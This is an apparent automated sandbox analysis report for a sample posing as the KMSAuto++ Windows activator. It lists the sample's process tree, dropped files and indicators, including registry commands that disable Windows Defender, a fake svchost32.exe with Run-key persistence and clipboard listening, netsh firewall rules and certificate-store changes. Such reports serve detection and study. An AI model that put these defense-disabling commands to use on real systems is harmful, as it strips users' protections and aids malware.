Analysis
-
max time kernel
106s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20221111-es -
resource tags
arch:x64arch:x86image:win7-20221111-eslocale:es-esos:windows7-x64systemwindows -
submitted
06-02-2023 17:00
Static task
static1
Behavioral task
behavioral1
Sample
KMSAuto++v1.6.4.exe
Resource
win7-20221111-es
Behavioral task
behavioral2
Sample
KMSAuto++v1.6.4.exe
Resource
win10v2004-20220812-es
General
-
Target
KMSAuto++v1.6.4.exe
-
Size
718.9MB
-
MD5
ef8cd375fdc780a87dbf601860994ab9
-
SHA1
b0aac6fb4006091219ba82a5838e810e0e27beba
-
SHA256
a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520
-
SHA512
52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417
-
SSDEEP
786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Creates new service(s) 1 TTPs
-
Modifies Windows Firewall 1 TTPs 10 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 1516 netsh.exe 1916 netsh.exe 844 netsh.exe 652 netsh.exe 480 netsh.exe 1336 netsh.exe 1760 netsh.exe 1308 netsh.exe 896 netsh.exe 1156 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
kmsauto++v1.6.4.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\KMSEmulator\ImagePath = "\"C:\\Users\\Admin\\KMSAuto_Files\\bin\\KMSSS.exe\" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP" kmsauto++v1.6.4.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 7 IoCs
Processes:
kms driver.exekmsauto++v1.6.4.exemicrosoft tap driver.exesvchost32.exesigntool.exeKMSSS.exeKMSSS.exepid process 1880 kms driver.exe 520 kmsauto++v1.6.4.exe 1596 microsoft tap driver.exe 1816 svchost32.exe 1652 signtool.exe 1904 KMSSS.exe 896 KMSSS.exe -
Loads dropped DLL 18 IoCs
Processes:
KMSAuto++v1.6.4.exekmsauto++v1.6.4.exepid process 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 1984 KMSAuto++v1.6.4.exe 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe -
Processes:
resource yara_rule \Users\Admin\kmsauto++v1.6.4.exe upx \Users\Admin\kmsauto++v1.6.4.exe upx C:\Users\Admin\kmsauto++v1.6.4.exe upx \Users\Admin\kmsauto++v1.6.4.exe upx \Users\Admin\kmsauto++v1.6.4.exe upx \Users\Admin\microsoft tap driver.exe upx \Users\Admin\microsoft tap driver.exe upx \Users\Admin\microsoft tap driver.exe upx C:\Users\Admin\microsoft tap driver.exe upx behavioral1/memory/520-90-0x0000000000400000-0x0000000001713000-memory.dmp upx behavioral1/memory/1596-93-0x0000000000400000-0x000000000041F000-memory.dmp upx C:\Users\Admin\kmsauto++v1.6.4.exe upx behavioral1/memory/520-134-0x0000000000400000-0x0000000001713000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
svchost32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce svchost32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe" svchost32.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exepid process 980 sc.exe 1048 sc.exe 1380 sc.exe 1880 sc.exe 2012 sc.exe 1244 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1516 1880 WerFault.exe kms driver.exe -
Processes:
signtool.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C signtool.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 signtool.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
svchost32.exepid process 1816 svchost32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
kmsauto++v1.6.4.exepid process 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exewmic.exedescription pid process Token: SeIncreaseQuotaPrivilege 1416 wmic.exe Token: SeSecurityPrivilege 1416 wmic.exe Token: SeTakeOwnershipPrivilege 1416 wmic.exe Token: SeLoadDriverPrivilege 1416 wmic.exe Token: SeSystemProfilePrivilege 1416 wmic.exe Token: SeSystemtimePrivilege 1416 wmic.exe Token: SeProfSingleProcessPrivilege 1416 wmic.exe Token: SeIncBasePriorityPrivilege 1416 wmic.exe Token: SeCreatePagefilePrivilege 1416 wmic.exe Token: SeBackupPrivilege 1416 wmic.exe Token: SeRestorePrivilege 1416 wmic.exe Token: SeShutdownPrivilege 1416 wmic.exe Token: SeDebugPrivilege 1416 wmic.exe Token: SeSystemEnvironmentPrivilege 1416 wmic.exe Token: SeRemoteShutdownPrivilege 1416 wmic.exe Token: SeUndockPrivilege 1416 wmic.exe Token: SeManageVolumePrivilege 1416 wmic.exe Token: 33 1416 wmic.exe Token: 34 1416 wmic.exe Token: 35 1416 wmic.exe Token: SeIncreaseQuotaPrivilege 1416 wmic.exe Token: SeSecurityPrivilege 1416 wmic.exe Token: SeTakeOwnershipPrivilege 1416 wmic.exe Token: SeLoadDriverPrivilege 1416 wmic.exe Token: SeSystemProfilePrivilege 1416 wmic.exe Token: SeSystemtimePrivilege 1416 wmic.exe Token: SeProfSingleProcessPrivilege 1416 wmic.exe Token: SeIncBasePriorityPrivilege 1416 wmic.exe Token: SeCreatePagefilePrivilege 1416 wmic.exe Token: SeBackupPrivilege 1416 wmic.exe Token: SeRestorePrivilege 1416 wmic.exe Token: SeShutdownPrivilege 1416 wmic.exe Token: SeDebugPrivilege 1416 wmic.exe Token: SeSystemEnvironmentPrivilege 1416 wmic.exe Token: SeRemoteShutdownPrivilege 1416 wmic.exe Token: SeUndockPrivilege 1416 wmic.exe Token: SeManageVolumePrivilege 1416 wmic.exe Token: 33 1416 wmic.exe Token: 34 1416 wmic.exe Token: 35 1416 wmic.exe Token: SeIncreaseQuotaPrivilege 1808 wmic.exe Token: SeSecurityPrivilege 1808 wmic.exe Token: SeTakeOwnershipPrivilege 1808 wmic.exe Token: SeLoadDriverPrivilege 1808 wmic.exe Token: SeSystemProfilePrivilege 1808 wmic.exe Token: SeSystemtimePrivilege 1808 wmic.exe Token: SeProfSingleProcessPrivilege 1808 wmic.exe Token: SeIncBasePriorityPrivilege 1808 wmic.exe Token: SeCreatePagefilePrivilege 1808 wmic.exe Token: SeBackupPrivilege 1808 wmic.exe Token: SeRestorePrivilege 1808 wmic.exe Token: SeShutdownPrivilege 1808 wmic.exe Token: SeDebugPrivilege 1808 wmic.exe Token: SeSystemEnvironmentPrivilege 1808 wmic.exe Token: SeRemoteShutdownPrivilege 1808 wmic.exe Token: SeUndockPrivilege 1808 wmic.exe Token: SeManageVolumePrivilege 1808 wmic.exe Token: 33 1808 wmic.exe Token: 34 1808 wmic.exe Token: 35 1808 wmic.exe Token: SeIncreaseQuotaPrivilege 1808 wmic.exe Token: SeSecurityPrivilege 1808 wmic.exe Token: SeTakeOwnershipPrivilege 1808 wmic.exe Token: SeLoadDriverPrivilege 1808 wmic.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
kmsauto++v1.6.4.exepid process 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
kmsauto++v1.6.4.exepid process 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe 520 kmsauto++v1.6.4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
KMSAuto++v1.6.4.exemicrosoft tap driver.execmd.exekmsauto++v1.6.4.exedescription pid process target process PID 1984 wrote to memory of 1880 1984 KMSAuto++v1.6.4.exe kms driver.exe PID 1984 wrote to memory of 1880 1984 KMSAuto++v1.6.4.exe kms driver.exe PID 1984 wrote to memory of 1880 1984 KMSAuto++v1.6.4.exe kms driver.exe PID 1984 wrote to memory of 1880 1984 KMSAuto++v1.6.4.exe kms driver.exe PID 1984 wrote to memory of 520 1984 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 1984 wrote to memory of 520 1984 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 1984 wrote to memory of 520 1984 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 1984 wrote to memory of 520 1984 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 1984 wrote to memory of 1596 1984 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 1984 wrote to memory of 1596 1984 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 1984 wrote to memory of 1596 1984 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 1984 wrote to memory of 1596 1984 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 1596 wrote to memory of 1736 1596 microsoft tap driver.exe cmd.exe PID 1596 wrote to memory of 1736 1596 microsoft tap driver.exe cmd.exe PID 1596 wrote to memory of 1736 1596 microsoft tap driver.exe cmd.exe PID 1596 wrote to memory of 1736 1596 microsoft tap driver.exe cmd.exe PID 1984 wrote to memory of 1816 1984 KMSAuto++v1.6.4.exe svchost32.exe PID 1984 wrote to memory of 1816 1984 KMSAuto++v1.6.4.exe svchost32.exe PID 1984 wrote to memory of 1816 1984 KMSAuto++v1.6.4.exe svchost32.exe PID 1984 wrote to memory of 1816 1984 KMSAuto++v1.6.4.exe svchost32.exe PID 1736 wrote to memory of 928 1736 cmd.exe reg.exe PID 1736 wrote to memory of 928 1736 cmd.exe reg.exe PID 1736 wrote to memory of 928 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1976 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1976 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1976 1736 cmd.exe reg.exe PID 520 wrote to memory of 1144 520 kmsauto++v1.6.4.exe cmd.exe PID 520 wrote to memory of 1144 520 kmsauto++v1.6.4.exe cmd.exe PID 520 wrote to memory of 1144 520 kmsauto++v1.6.4.exe cmd.exe PID 520 wrote to memory of 1144 520 kmsauto++v1.6.4.exe cmd.exe PID 1736 wrote to memory of 1020 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1020 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1020 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1428 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1428 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1428 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1924 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1924 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1924 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1156 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1156 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1156 1736 cmd.exe reg.exe PID 520 wrote to memory of 1652 520 kmsauto++v1.6.4.exe signtool.exe PID 520 wrote to memory of 1652 520 kmsauto++v1.6.4.exe signtool.exe PID 520 wrote to memory of 1652 520 kmsauto++v1.6.4.exe signtool.exe PID 520 wrote to memory of 1652 520 kmsauto++v1.6.4.exe signtool.exe PID 1736 wrote to memory of 1416 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1416 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1416 1736 cmd.exe reg.exe PID 1736 wrote to memory of 480 1736 cmd.exe reg.exe PID 1736 wrote to memory of 480 1736 cmd.exe reg.exe PID 1736 wrote to memory of 480 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1276 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1276 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1276 1736 cmd.exe reg.exe PID 1736 wrote to memory of 544 1736 cmd.exe reg.exe PID 1736 wrote to memory of 544 1736 cmd.exe reg.exe PID 1736 wrote to memory of 544 1736 cmd.exe reg.exe PID 1736 wrote to memory of 972 1736 cmd.exe reg.exe PID 1736 wrote to memory of 972 1736 cmd.exe reg.exe PID 1736 wrote to memory of 972 1736 cmd.exe reg.exe PID 1736 wrote to memory of 2040 1736 cmd.exe reg.exe PID 1736 wrote to memory of 2040 1736 cmd.exe reg.exe PID 1736 wrote to memory of 2040 1736 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\kms driver.exe"C:\Users\Admin\kms driver.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1880 -s 5843⤵
- Program crash
-
C:\Users\Admin\kmsauto++v1.6.4.exe"C:\Users\Admin\kmsauto++v1.6.4.exe"2⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y3⤵
-
C:\Users\Admin\AppData\Local\Temp\signtool.exe"C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" path Win32_NetworkAdapter get ServiceName /value /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%') get Name, Description, ID, PartialProductKey, LicenseStatus, KeyManagementServiceMachine, KeyManagementServicePort, VLRenewalInterval, GracePeriodRemaining, KeyManagementServicePort, KeyManagementServiceProductKeyID /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" path SoftwareLicensingService get Version /value /FORMAT:List3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP3⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=16883⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=16884⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP3⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=16883⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=16884⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto3⤵
-
C:\Windows\system32\sc.exesc.exe create KMSEmulator binpath= temp.exe type= own start= auto4⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator3⤵
-
C:\Windows\system32\sc.exesc.exe start KMSEmulator4⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:16883⤵
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:16884⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato3⤵
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato4⤵
-
C:\Windows\system32\slui.exe"C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C0033⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c sc.exe stop KMSEmulator3⤵
-
C:\Windows\system32\sc.exesc.exe stop KMSEmulator4⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c sc.exe delete KMSEmulator3⤵
-
C:\Windows\system32\sc.exesc.exe delete KMSEmulator4⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP3⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP3⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP3⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=16883⤵
-
